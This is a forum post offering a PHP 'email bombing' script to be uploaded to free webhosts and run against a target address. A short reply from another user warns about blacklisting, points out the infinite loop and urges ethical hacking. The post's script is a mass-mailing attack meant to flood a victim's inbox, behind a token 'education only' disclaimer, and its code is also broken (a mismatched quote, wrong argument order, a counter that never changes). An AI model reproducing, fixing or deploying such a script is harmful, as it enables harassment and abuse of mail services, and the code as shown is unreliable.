Free website and email bombarding 2nd trick
Use
this php script and save it as .php and upload to free webhost LIKE
1.Http://www.ofees.net
2.http://www.000webhost.com
3.http://www.007sites.com and many more such as phpzilla.net
,webs.com
and when you go to that link it gets executed and email bombarding
starts
i again say
NOTE:THIS INFO FOR EDUCATION PURPOSE ONLY I M NOT RESPONSIBLE FOR DAMAGE
<?php
$mail=1;
do
{
mail("targetemail@em.com,"from","message","subject");
}while ($mail<50000);
?>
correct me if i m wrong
waiting for commemt
pramoddutta



Hi Pramoddutta,
Using these scripts will result in your Server IP getting blacklisted immediately across all major networks. Moreover the script you have posted above will run into an infinite loop. I strongly advise you against posting/using these kind of scripts. If you are really interested in hacking you should shift your focus towards identifying security problems and vulnerable bugs within a system(of your choice) and fixing them. This is known as Ethical Hacking.